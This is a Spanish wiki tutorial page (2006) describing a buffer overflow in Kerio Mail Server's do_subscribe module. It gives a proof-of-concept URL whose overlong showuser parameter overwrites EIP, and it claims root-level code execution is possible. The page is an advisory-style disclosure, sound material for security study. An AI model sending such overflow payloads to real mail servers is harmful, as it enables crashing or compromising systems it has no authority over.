Inicio / Wikis / Tutoriales / Multiples desbordamientos de buffer y cross site scripting en Kerio Mail Server - Módulo do_subscribe

Multiples desbordamientos de buffer y cross site scripting en Kerio Mail Server - Módulo do_subscribe

Tutorial creado por David F. Madrid. Extraido de: http://www.nautopia.net
21 de Febrero de 2006
Servidores de contenidosServidores de correoServidores web

2 - Módulo do_subscribe

Un nombre de usuario largo provoca una total corrupción de la pila y que se sobreescriba el puntero de instrucción EIP de un thread del programa

http://[server]/do_subscribe?showuser=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAA   

Debido a que los tres primeros bytes de EIP son sobreescritos se puede ejecutar código con privilegios de root.
Valora este capítulo:
Autor y licencia de 'Multiples desbordamientos de buffer y cross site scripting en Kerio Mail Server - Módulo do_subscribe'
David F. Madrid Extraído de: http://www.nautopia.net

Creative Commons License
Esta obra está bajo una licencia de Creative Commons.
Debe reconocer los créditos de la obra de la manera especificada por el autor o el licenciador.
Este contenido ha sido recopilado por el equipo de Wikilearning. Todo el contenido recopilado se ha obtenido respetando y comunicando en nuestro site la licencia de cada fuente.
Wikilearning tiene permiso expreso por escrito de los autores para publicar los contenidos que ha extraído de otras webs, incluyendo su uso comercial.

Opiniona sobre 'Multiples desbordamientos de buffer y cross site scripting en Kerio Mail Server - Módulo do_subscribe' (0)

Tu nombre debe tener tres caracteres como mínimo.
Es necesario que te des de alta con una cuenta de correo válida.
Es necesario que te des de alta con una cuenta de correo válida.
El contenido del título de tu opinión debe tener tres caracteres como mínimo.
Es obligatorio que selecciones una valoración del recurso.
El contenido del comentario de tu opinión debe tener tres caracteres como mínimo.

Opina sobre este tutorial



* Valoración:
* Nombre:
* Correo electrónico:
* Título:
* Comentario:

Wikis relacionados con 'Multiples desbordamientos de buffer y cross site scripting en Kerio Mail Server - Módulo do_subscribe'

PHP es un lenguaje de programación diseñado específicamente para aplicaciones Web; las características más destacables... Más »
PHP es un lenguaje de programación diseñado específicamente para aplicaciones Web; las características más destacables... Más »
El video corporativo no es uno sólo, sino múltiples manifestaciones de una realidad, cuyas proyecciones... Más »
Hablar de formas visuales en poesía es hablar de una tendencia experimental en la lírica... Más »
Un índice puede ser definido como un instrumento estadístico que representa en forma abreviada y... Más »
¿Estás seguro de que deseas eliminar este capítulo?